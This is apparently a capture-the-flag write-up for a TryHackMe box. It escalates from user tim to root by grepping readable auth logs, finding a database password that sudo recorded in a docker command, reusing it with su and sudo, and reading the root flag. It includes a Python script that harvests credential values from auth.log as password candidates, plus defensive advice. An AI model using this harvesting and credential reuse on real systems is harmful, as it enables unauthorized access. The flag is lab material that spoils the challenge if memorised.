privEscRoot
# Privilege Escalation after successful SSH login - THM box
After cracking a password and logging in over SSH as tim, a single `cd ..` takes you out of the home directory. tim cannot enter /root, but on this box the auth logs are readable, and that is all that is needed. Grep them for anything password-related:
```
cat /var/log/auth* | grep -i pass
```
Caveat: on a default Ubuntu install /var/log/auth.log is owned by root:adm with mode 0640, so an unprivileged user can only read it when the permissions have been loosened (as they are here) or the user is in the adm group.
This specific example output:
```
tim@silver-platter:/$ cat /var/log/auth* | grep -i pass
Jan 15 01:35:09 silver-platter sshd[2972]: Accepted password for tim from 10.10.58.77 port 38358 ssh2
May 8 08:58:40 silver-platter sshd[1710]: Accepted password for tyler from 192.168.1.20 port 42258 ssh2
May 8 14:00:53 silver-platter sshd[1946]: Accepted password for tyler from 192.168.1.20 port 55742 ssh2
Dec 12 19:34:40 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 12 19:34:46 silver-platter passwd[1576]: pam_unix(passwd:chauthtok): password changed for tim
Dec 12 19:39:15 silver-platter sudo: tyler : 3 incorrect password attempts ; TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/apt install nginx
Dec 13 15:39:07 silver-platter usermod[1597]: change user 'dnsmasq' password
Dec 13 15:39:07 silver-platter chage[1604]: changed password expiry for dnsmasq
Dec 13 15:40:33 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_$H12=R13h- -v postgresql-data:/var/lib/postgresql/data postgres:12.3
Dec 13 15:44:30 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_$H12=R13h- -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database sivlerpeas:silverpeas-6.3.1
Dec 13 15:45:21 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_$H12=R13h- -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:silverpeas-6.3.1
Dec 13 15:45:57 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_$H12=R13h- -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1
Dec 13 16:17:21 silver-platter sudo: tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 16:17:31 silver-platter passwd[6811]: pam_unix(passwd:chauthtok): password changed for tim
Dec 13 16:18:57 silver-platter sshd[6879]: Accepted password for tyler from 192.168.1.20 port 47772 ssh2
Dec 13 16:32:41 silver-platter sudo: tyler : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 16:32:54 silver-platter passwd[7174]: pam_unix(passwd:chauthtok): password changed for tim
Dec 13 16:33:12 silver-platter sshd[7181]: Accepted password for tim from 192.168.1.20 port 50970 ssh2
Dec 13 16:35:45 silver-platter sshd[7297]: Accepted password for tyler from 192.168.1.20 port 58172 ssh2
Dec 13 16:45:33 silver-platter sshd[7622]: Accepted password for tyler from 192.168.1.20 port 33484 ssh2
Dec 13 17:43:09 silver-platter sshd[7750]: Accepted password for tyler from 192.168.1.20 port 45796 ssh2
Dec 13 17:51:30 silver-platter sshd[1370]: Accepted password for tyler from 192.168.1.20 port 60860 ssh2
Dec 13 17:51:41 silver-platter sshd[1681]: Accepted password for tyler from 192.168.1.20 port 55392 ssh2
```
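The manual grep above works, but on a busier host `grep -i pass` returns a lot of noise (the `Accepted password` and `incorrect password attempts` lines match too). The following Python script is an added example and not part of the original writeup: it parses sudo entries in the auth.log format shown above, pulls out `KEY=VALUE` arguments whose key looks like a password, secret or token, and also records which accounts root reset with `passwd` and which users authenticate over SSH with a password (both are useful when deciding where to try the harvested value). The sample log lines are constructed in the same format with placeholder hostnames and values; the function names, regexes and field names are my own, not a library API.

```python
import re
import sys
from typing import Dict, List

# Constructed sample in /var/log/auth.log format (sudo and sshd entries).
# These are NOT the box's real log lines; hostnames and secret values are placeholders.
SAMPLE_AUTH_LOG = """\
Dec 13 16:18:57 host sshd[6879]: Accepted password for tyler from 192.168.1.20 port 47772 ssh2
Dec 13 16:32:41 host sudo: tyler : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 15:40:33 host sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=Pl4ceholder! -v pgdata:/var/lib/postgresql/data postgres:12.3
Dec 13 15:44:30 host sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name app -d -e DB_USER=app -e DB_PASSWORD=Pl4ceholder! -e API_TOKEN=tok_abc123 app:1.0
Dec 12 19:39:15 host sudo: tyler : 3 incorrect password attempts ; TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/apt install nginx
"""

# sudo's syslog line: "<sudoer> : [<failure note> ; ]TTY=... ; PWD=... ; USER=<target> ; COMMAND=<full argv>"
SUDO_RE = re.compile(
    r"^\w{3}\s+\d+ [\d:]+ \S+ sudo:\s+(?P<who>\S+) : (?:.*?; )?"
    r"TTY=\S+ ; PWD=\S+ ; USER=(?P<run_as>\S+) ; COMMAND=(?P<cmd>.*)$"
)
SSH_RE = re.compile(r"sshd\[\d+\]: Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+")
# KEY=VALUE arguments whose key smells like a credential (DB_PASSWORD=, API_TOKEN=, --secret=...)
SECRET_RE = re.compile(r"(?P<key>[\w.-]*(?:pass|secret|token)[\w.-]*)=(?P<val>\S+)", re.IGNORECASE)
# "passwd <user>" executed through sudo: root reset that account's password
PASSWD_RE = re.compile(r"(?:^|\s|/)passwd\s+(?P<target>\S+)$")


def triage_auth_log(text: str) -> Dict[str, list]:
    """Walk auth.log text and collect leaked secrets, password resets and SSH password logins."""
    findings: Dict[str, list] = {"secrets": [], "password_resets": [], "ssh_password_logins": []}
    for line in text.splitlines():
        ssh = SSH_RE.search(line)
        if ssh:
            findings["ssh_password_logins"].append((ssh["user"], ssh["ip"]))
            continue
        sudo = SUDO_RE.match(line)
        if not sudo:
            continue
        cmd = sudo["cmd"]
        # Only the COMMAND= part is scanned, so sudo's own "incorrect password attempts" note is not a hit.
        for s in SECRET_RE.finditer(cmd):
            findings["secrets"].append(
                {"sudoer": sudo["who"], "run_as": sudo["run_as"], "key": s["key"], "value": s["val"], "cmd": cmd}
            )
        reset = PASSWD_RE.search(cmd)
        if reset:
            findings["password_resets"].append((sudo["who"], reset["target"]))
    return findings


def candidate_passwords(findings: Dict[str, list]) -> List[str]:
    """Unique leaked values, ready to try with su/ssh against every user seen in the log."""
    return sorted({s["value"] for s in findings["secrets"]})


def main(argv: List[str]) -> None:
    # Usage: python3 triage_auth.py [/var/log/auth.log]; without a path the constructed sample is used.
    text = open(argv[1], errors="replace").read() if len(argv) > 1 else SAMPLE_AUTH_LOG
    f = triage_auth_log(text)
    for s in f["secrets"]:
        print(f"[secret] {s['sudoer']} (as {s['run_as']}): {s['key']}={s['value']}")
    for who, target in f["password_resets"]:
        print(f"[reset]  {who} ran passwd for {target}")
    for user, ip in f["ssh_password_logins"]:
        print(f"[ssh]    {user} logs in with a password from {ip}")
    print("[try]    candidates:", ", ".join(candidate_passwords(f)))


if __name__ == "__main__":
    main(sys.argv)
```

The root cause worth remembering from the defender's side: sudo logs `COMMAND=` with every argument, so any secret passed on the command line (docker `-e VAR=value`, a `--password=` flag) lands in auth.log, the syslog stream, shell history and `ps` output. Passing it through `--env-file` with a mode 0600 file, or a secrets store, keeps it out of all four.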
## su to tyler with the password leaked in the sudo log
The sudo entries record the full command line, so the value tyler passed to docker as `-e POSTGRES_PASSWORD=...` and `-e DB_PASSWORD=...` is sitting in the log, and tyler is the account that runs commands as root via sudo. Reuse it to switch user:
```
su tyler
Password: [found_above_in_output]
tyler@silver-platter:/$
```
Note: I obfuscated the password so you cannot copy and paste it to retrieve the root flag. Run the commands on your live box to solve it.
Then run `sudo -l` to list what tyler may run as root, followed by `sudo su` (re-entering tyler's password) to spawn a root shell and gain access to root's documents and config files. Once the login is confirmed:
```
[sudo] password for tyler: [found_above]
root@silver-platter:/# cd root
root@silver-platter:~# ls
root.txt snap start_docker_containers.sh
root@silver-platter:~# cat root.txt
THM{0f0i0n0d_0i0t_0y0o0u0r0s0e0l0f}
root@silver-platter:~#
```
<3